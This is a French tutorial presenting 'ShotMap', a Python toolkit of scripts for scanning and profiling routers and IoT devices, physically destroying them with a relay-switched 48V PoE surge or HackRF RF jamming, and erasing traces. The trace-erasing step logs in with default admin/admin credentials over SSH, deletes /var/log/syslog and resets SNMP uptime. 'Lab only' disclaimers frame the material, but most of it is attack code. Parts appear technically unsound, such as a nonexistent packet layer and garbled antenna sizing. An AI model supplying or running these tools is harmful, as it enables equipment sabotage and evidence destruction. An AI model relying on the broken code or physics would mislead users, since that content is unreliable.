Introduction

Salut, Sniper ! *One Shot, One Kill* est ton billet pour devenir un sniper cyber : avec *ShotMap*, tu vas scanner, cibler, et neutraliser des devices dans ton lab, comme un tir précis à 1000 mètres. Débutant ou pro, ce tuto est pour toi – mais lab only, Apache ! Toujours éthique, pour les hackers de tous horizons. 😈

Ce que tu vas apprendre :

Étape 1 : Le Mindset Sniper

Un sniper cyber, c’est une ombre : il observe, attend, et frappe pile là où ça fait mal. Pas besoin d’être un pro pour capter :

Pense à un sniper : discipline, focus. À toi de viser juste.

Étape 2 : Le Lab de l’Ombre

Ton lab, c’est ton terrain de chasse : routeurs (Cisco, MikroTik), IoT (caméras, plugs), vieux matos, et même un sat simulé pour pimenter. Chaque device est une cible, chaque quartz un esprit à neutraliser. Débutant ? On te guide pas à pas :

Setup simple :

Installation :

sudo apt update && sudo apt install -y python3 python3-pip nmap snmp metasploit-framework
pip3 install scapy pysnmp shodan RPi.GPIO pycryptodome hackrf

Lab only, Apache ! Ce tuto est pour ton terrain privé. Attaquer un device non autorisé, c’est illégal partout. Reste clean.

Étape 3 : ShotMap – L’arme du sniper

*ShotMap* est ton fusil : un outil Python CLI qui scanne, cible, tire, protège, et disparaît. Débutant ? Les scripts sont plug-and-play. Pro ? Tu vas kiffer la modularité et la furtivité. On a tout pensé pour que ça marche sur n’importe quel réseau, du lab au chaos mondial.

Guide de test complet

Voici comment tester *ShotMap* dans ton lab, étape par étape, pour que même un newbie puisse snipper comme un pro :

  1. Préparer le lab : Branche un routeur (ex. : Cisco RV340), une caméra IoT, ou un device simulé (ex. : sat via SDR). Note l’IP (ex. : 192.168.1.1). Assure-toi que Kali est à jour (sudo apt update).
  2. Installer ShotMap : Copie les scripts (*recon.py*, *target.py*, *fire.py*, *cleanup.py*, *defense.py*) dans un dossier (ex. : ~/shotmap). Installe les dépendances (voir ci-dessus). Change API_KEY dans *recon.py* et YourSuperSecretKey pour le chiffrement.
  3. Reconnaissance : Lance python3 recon.py --passive pour sniffer ou python3 recon.py pour un scan actif. Vérifie targets.json.enc. Décrypte si besoin (ajoute un script de déchiffrement si tu veux).
  4. Ciblage : Choisis une IP (ex. : 192.168.1.1) et lance python3 target.py 192.168.1.1. Vérifie target_192.168.1.1.json.enc. Le script te dira si le quartz est vulnérable (ex. : PoE).
  5. Tir : Branche le *Quartz Killer* (voir hardware). Lance python3 fire.py 192.168.1.1 --method poe pour PoE ou --method rf --freq 25MHz pour HackRF. Vérifie si le device est HS (ping négatif).
  6. Défense : Lance python3 defense.py sur une autre machine pour surveiller les pulses PoE. Configure un SMTP local si tu veux des alertes.
  7. Nettoyage : Lance python3 cleanup.py 192.168.1.1 pour effacer les logs et timestamps SNMP.
  8. Réparation : Remplace le quartz grillé (voir réparation). Relance le device et répète.

Polyvalence :

Conseils :

Module 1 : Reconnaissance (recon.py)

Comme un sniper dans la jungle, *recon.py* trouve les devices sans un bruit. Mode passif (sniff) ou actif (SYN furtif), il profile avec Shodan.

#!/usr/bin/env python3
import scapy.all as scapy
import json
import subprocess
from shodan import Shodan

# Configuration (change pour ton lab)
API_KEY = "YOUR_SHODAN_API_KEY"  # Ta clé Shodan
NETWORK = "192.168.1.0/24"  # Ton réseau

def run_nmap(ip):
    try:
        result = subprocess.run(["nmap", "-O", ip], capture_output=True, text=True)
        return result.stdout
    except:
        return "Nmap échoué"

def shotmap_recon(network=NETWORK, passive=False):
    print("[*] ShotMap Recon v1.0 - One Shot, One Kill")
    targets = []
    try:
        if passive:
            print("[*] Sniffing pendant 30s...")
            packets = scapy.sniff(timeout=30)
            for pkt in packets:
                if pkt.haslayer(scapy.IP):
                    ip = pkt[scapy.IP].src
                    if ip not in [t["ip"] for t in targets]:
                        targets.append({"ip": ip, "model": "unknown", "quartz": "unknown"})
        else:
            print("[*] Scan actif furtif...")
            ans, _ = scapy.sr(scapy.IP(dst=network)/scapy.TCP(dport=80, flags="S"), timeout=2, verbose=0)
            for sent, recv in ans:
                ip = recv[scapy.IP].src
                targets.append({"ip": ip, "model": "unknown", "quartz": "unknown"})

        # OSINT avec Shodan
        api = Shodan(API_KEY)
        for target in targets:
            try:
                result = api.host(target["ip"])
                target["model"] = result.get("product", "unknown")
                target["quartz"] = "estimated 25-50 MHz"
                target["nmap"] = run_nmap(target["ip"])
            except Exception as e:
                print(f"[!] Erreur Shodan pour {target['ip']}: {e}")
                target["nmap"] = run_nmap(target["ip"])

        # Chiffrement des logs
        from Crypto.Cipher import AES
        key = "YourSuperSecretKey".encode()  # Change ça !
        cipher = AES.new(key, AES.MODE_EAX)
        data = json.dumps(targets, indent=2).encode()
        ciphertext, tag = cipher.encrypt_and_digest(data)
        with open("targets.json.enc", "wb") as f:
            f.write(cipher.nonce + tag + ciphertext)
        print("[+] Logs chiffrés dans targets.json.enc")
    except Exception as e:
        print(f"[!] Erreur générale: {e}")
        print("[*] Reste calme, vérifie ta config et relance.")
    return targets

if __name__ == "__main__":
    try:
        targets = shotmap_recon()
        for t in targets:
            print(f"[+] Target: {t['ip']} | Model: {t['model']} | Quartz: {t['quartz']}")
            if t.get("nmap"):
                print(f"[+] Nmap: {t['nmap'][:100]}...")
    except KeyboardInterrupt:
        print("[*] Arrêt par l’utilisateur. T’es toujours un Apache !")
    except Exception as e:
        print(f"[!] Erreur: {e}")
        print("[*] Console ouverte, débroussaille le bug !")

Module 2 : Ciblage (target.py)

*target.py* zoome sur un device, trouve son modèle via SNMP, et te dit comment le snipper.

#!/usr/bin/env python3
import json
from pysnmp.hlapi import *
import argparse
import subprocess

# Base de données (ajoute tes devices)
QUARTZ_DB = {
    "Cisco RV340": {"quartz": "50 MHz", "type": "SMD", "vuln": "PoE spike"},
    "MikroTik RB750": {"quartz": "25 MHz", "type": "SMD", "vuln": "PoE spike"}
}

def run_msf_probe(ip):
    try:
        result = subprocess.run(["msfconsole", "-q", "-x", f"use auxiliary/scanner/snmp/snmp_login; set RHOSTS {ip}; run; exit"], capture_output=True, text=True)
        return result.stdout
    except:
        return "Metasploit échoué"

def get_snmp_info(ip, community="public"):
    try:
        iterator = getCmd(
            SnmpEngine(),
            CommunityData(community),
            UdpTransportTarget((ip, 161)),
            ContextData(),
            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))
        )
        errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
        if errorIndication or errorStatus:
            return "unknown"
        return str(varBinds[0][1])
    except:
        return "unknown"

def shotmap_target(ip):
    print("[*] ShotMap Target v1.0 - One Shot, One Kill")
    try:
        print("[*] Profilage de", ip)
        model = get_snmp_info(ip)
        if "cisco" in model.lower():
            model = "Cisco RV340"
        elif "mikrotik" in model.lower():
            model = "MikroTik RB750"
        else:
            model = "unknown"

        target_info = QUARTZ_DB.get(model, {"quartz": "unknown", "type": "unknown", "vuln": "unknown"})
        target_info["ip"] = ip
        target_info["model"] = model
        target_info["msf"] = run_msf_probe(ip)

        # Chiffrement
        from Crypto.Cipher import AES
        key = "YourSuperSecretKey".encode()
        cipher = AES.new(key, AES.MODE_EAX)
        data = json.dumps(target_info, indent=2).encode()
        ciphertext, tag = cipher.encrypt_and_digest(data)
        with open(f"target_{ip}.json.enc", "wb") as f:
            f.write(cipher.nonce + tag + ciphertext)
        print("[+] Target chiffré dans target_{}.json.enc".format(ip))
        return target_info
    except Exception as e:
        print(f"[!] Erreur: {e}")
        print("[*] Reste en console, check SNMP et relance.")
        return {"ip": ip, "model": "unknown", "vuln": "unknown"}

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ShotMap Target - One Shot, One Kill")
    parser.add_argument("ip", help="IP du device")
    args = parser.parse_args()

    try:
        target = shotmap_target(args.ip)
        print(f"[+] Target: {target['ip']} | Model: {target['model']} | Quartz: {target['quartz']} | Vuln: {target['vuln']}")
        if target.get("msf"):
            print(f"[+] Metasploit: {target['msf'][:100]}...")
    except KeyboardInterrupt:
        print("[*] Arrêt par l’Apache. T’es toujours dans le game !")

Module 3 : Tir (fire.py)

*fire.py* grille le quartz via PoE ou RF. Robuste et clair pour tous.

#!/usr/bin/env python3
import RPi.GPIO as GPIO
import time
import json
import argparse
import random

# RF support (optionnel)
try:
    from hackrf import HackRF
except ImportError:
    HackRF = None

def load_target(ip):
    try:
        with open(f"target_{ip}.json.enc", "rb") as f:
            data = f.read()
        from Crypto.Cipher import AES
        key = "YourSuperSecretKey".encode()
        nonce, tag, ciphertext = data[:16], data[16:32], data[32:]
        cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
        plaintext = cipher.decrypt_and_verify(ciphertext, tag)
        return json.loads(plaintext)
    except Exception as e:
        print(f"[!] Erreur chargement cible: {e}")
        return {"ip": ip, "model": "unknown", "vuln": "unknown"}

def fire_poe(duration=0.5):
    try:
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(18, GPIO.OUT)
        print("[*] Firing PoE pulse...")
        GPIO.output(18, GPIO.HIGH)
        time.sleep(duration)
        GPIO.output(18, GPIO.LOW)
        GPIO.cleanup()
    except Exception as e:
        print(f"[!] Erreur PoE: {e}")
        print("[*] Vérifie ton Raspberry Pi et relance.")

def fire_rf(freq="25MHz", duration=0.5):
    if not HackRF:
        print("[!] HackRF non installé. Installez via 'pip3 install hackrf'.")
        return False
    try:
        print("[*] Firing RF jam...")
        with HackRF() as hrf:
            hrf.transmit(lambda t: [random.randint(-128, 127) for _ in range(2048)], freq, sample_rate=20e6, tx_gain=40)
            time.sleep(duration)
        return True
    except Exception as e:
        print(f"[!] Erreur RF: {e}")
        return False

def shotmap_fire(ip, method="poe", duration=0.5, freq="25MHz"):
    print("[*] ShotMap Fire v1.0 - One Shot, One Kill")
    try:
        target = load_target(ip)
        if target["vuln"] != "PoE spike" and method == "poe":
            print(f"[!] {target['model']} non vulnérable à PoE")
            return False

        if method == "poe":
            fire_poe(duration)
            print(f"[+] Quartz neutralisé sur {ip} ({target['model']})")
            return True
        elif method == "rf":
            success = fire_rf(freq, duration)
            if success:
                print(f"[+] Quartz brouillé sur {ip} ({target['model']})")
            return success
        else:
            print("[!] Méthode non supportée")
            return False
    except Exception as e:
        print(f"[!] Erreur: {e}")
        print("[*] Console ouverte, check ton matos et relance.")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ShotMap Fire - One Shot, One Kill")
    parser.add_argument("ip", help="IP du device")
    parser.add_argument("--method", default="poe", choices=["poe", "rf"], help="Méthode d'attaque")
    parser.add_argument("--duration", type=float, default=0.5, help="Durée du pulse (s)")
    parser.add_argument("--freq", default="25MHz", help="Fréquence RF")
    args = parser.parse_args()

    try:
        shotmap_fire(args.ip, args.method, args.duration, args.freq)
    except KeyboardInterrupt:
        print("[*] Arrêt par l’Apache. Reviens snipper !")

Module 4 : Nettoyage (cleanup.py)

*cleanup.py* efface tes traces, y compris les timestamps SNMP.

#!/usr/bin/env python3
import paramiko
import argparse
from pysnmp.hlapi import *

def clean_logs(ip, username="admin", password="admin"):
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(ip, username=username, password=password)
        ssh.exec_command("rm -f /var/log/syslog")
        ssh.close()
        print(f"[+] Logs nettoyés sur {ip}")
        return True
    except Exception as e:
        print(f"[!] Échec SSH: {e}")
        return False

def clean_snmp_timestamps(ip, community="public"):
    try:
        iterator = setCmd(
            SnmpEngine(),
            CommunityData(community),
            UdpTransportTarget((ip, 161)),
            ContextData(),
            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysUpTime', 0), TimeTicks(0))
        )
        errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
        if errorIndication or errorStatus:
            print(f"[!] Échec SNMP: {errorIndication or errorStatus}")
            return False
        print(f"[+] Timestamps SNMP réinitialisés sur {ip}")
        return True
    except Exception as e:
        print(f"[!] Erreur SNMP: {e}")
        return False

def shotmap_cleanup(ip):
    print("[*] ShotMap Cleanup v1.0 - One Shot, One Kill")
    try:
        clean_logs(ip)
        clean_snmp_timestamps(ip)
        print(f"[+] Cleanup terminé pour {ip}")
    except Exception as e:
        print(f"[!] Erreur: {e}")
        print("[*] Console ouverte, check tes creds et relance.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ShotMap Cleanup - One Shot, One Kill")
    parser.add_argument("ip", help="IP du device")
    args = parser.parse_args()

    try:
        shotmap_cleanup(args.ip)
    except KeyboardInterrupt:
        print("[*] Arrêt par l’Apache. T’es clean !")

Module 5 : Défense (defense.py)

*defense.py* surveille les pulses PoE pour protéger ton lab.

#!/usr/bin/env python3
from scapy.all import *
import smtplib
from email.message import EmailMessage

def alert_admin(message):
    try:
        msg = EmailMessage()
        msg.set_content(message)
        msg["Subject"] = "Alerte ShotMap Défense"
        msg["From"] = "shotmap@lab.local"
        msg["To"] = "admin@lab.local"
        with smtplib.SMTP("localhost", 25) as s:
            s.send_message(msg)
        print("[+] Alerte envoyée")
    except Exception as e:
        print(f"[!] Échec alerte: {e}")

def detect_poe_attack(interface="eth0"):
    print("[*] Surveillance PoE sur", interface)
    try:
        cap = sniff(iface=interface, filter="ether proto 0x8808", count=10)
        for pkt in cap:
            if pkt.haslayer("PowerEthernet") and pkt[PowerEthernet].voltage > 50:
                alert_admin(f"Attaque PoE détectée sur {interface} ! Voltage: {pkt[PowerEthernet].voltage}V")
                print("[!] Surtension détectée")
                return True
        print("[+] Rien de suspect")
        return False
    except Exception as e:
        print(f"[!] Erreur: {e}")
        return False

def shotmap_defense(interface="eth0"):
    print("[*] ShotMap Defense v1.0 - One Shot, One Kill")
    try:
        detect_poe_attack(interface)
    except Exception as e:
        print(f"[!] Erreur: {e}")
        print("[*] Console ouverte, vérifie ton interface.")

if __name__ == "__main__":
    try:
        shotmap_defense()
    except KeyboardInterrupt:
        print("[*] Arrêt par l’Apache. Ton lab est safe !")

Explications pour tous :

Utilisation : Lance python3 nom_du_script.py dans un terminal. Change l’IP et la clé Shodan dans *recon.py*. RF ? Installe *hackrf*. Ça plante ? Lis les logs, on reste en console.

Étape 4 : Quartz Killer – Le tir parfait

Le *Quartz Killer* est ton arme physique : un adaptateur PoE ou un HackRF One. Voici le schéma ASCII pour le PoE :


+-----------------+
| Raspberry Pi    |
|                 |
|  GND   [ ]      |
|  3.3V  [ ]      |
|  GPIO18[•]------+-----[Wire]-----+
|                 |                |
+-----------------+                |
                                   |
+-----------------+                |
| Relais 5V       |                |
|                 |                |
|  IN   [•]-------|----------------+
|  COM  [•]---+---+---[Wire]---[ +48V PoE Injecteur ]
|  NO   [•]---|--------------------[ RJ45 to Device ]
|  NC   [ ]   |                    |
|             +---[Wire]---[ GND PoE Injecteur ]
|                 |
+-----------------+
            

Explications :

RF (avancé) : Brouille le quartz avec un HackRF One (25 MHz). Installe :

pip3 install hackrf

Explications :

Étape 5 : Optimisation – Antenne directionnelle DIY

Booste ton HackRF avec une antenne faite maison. Matériel : cintre, connecteur SMA, fil de cuivre, planche.

Matériel :

Étapes :

  1. Calcul : Pour 25 MHz, longueur d’onde = 12 m (c = 3e8 m/s, λ = c/f). Dipôle demi-onde = 6 m. Réduit à 30 cm pour le lab.
  2. Dipôle : Coupe le cintre en deux segments de 15 cm. Soude un à la broche SMA, l’autre à la masse.
  3. Réflecteur : Fil de cuivre (16 cm) à 7 cm derrière, fixé sur la planche.
  4. Fixation : Colle ou visse. Branche au HackRF.
  5. Test : Vise un device à 1 m, lance python3 fire.py --method rf. Ajuste l’angle.

Conseils :

Attention ! Émissions RF = lois strictes. Lab only, sur ton matos.

Étape 6 : PCB Prêt-à-Souder

Fabrique un *Quartz Killer* pro avec un PCB. Schéma ASCII ci-dessus (section hardware).

Explications :

Étape 7 : Réparation – Le cycle éthique

Griller, c’est cool, réparer, c’est pro. Pas besoin d’être un as :

#!/usr/bin/env python3
quartz_db = {
    "Cisco RV340": {"freq": "50 MHz", "type": "SMD"},
    "MikroTik RB750": {"freq": "25 MHz", "type": "SMD"}
}

def suggest_repair(ip, model):
    try:
        quartz = quartz_db.get(model, {"freq": "unknown", "type": "unknown"})
        print(f"[*] Quartz pour {model}: {quartz['freq']}, {quartz['type']}")
        print("[+] Commander sur Mouser or DigiKey")
    except Exception as e:
        print(f"[!] Erreur: {e}")

if __name__ == "__main__":
    try:
        suggest_repair("192.168.1.1", "Cisco RV340")
    except KeyboardInterrupt:
        print("[*] Arrêt par l’Apache. À la prochaine !")

Étape 8 : FAQ Légale

Questions ? Réponses nettes :

Doute ? Parle à un avocat ou une autorité cyber.

Étape 9 : Éthique – Snipers, pas criminels

“ShotMap n’est pas un outil, c’est une philosophie : frapper peu, frapper juste, et protéger toujours.” On casse en lab pour protéger dehors. Déclare tes failles (ex. : CVE), partage le savoir, sois un Apache droit. Le savoir est notre arme, l’éthique notre bouclier.

Pas de conneries, Apache ! Hors lab, c’est la taule. Reste dans ton terrain.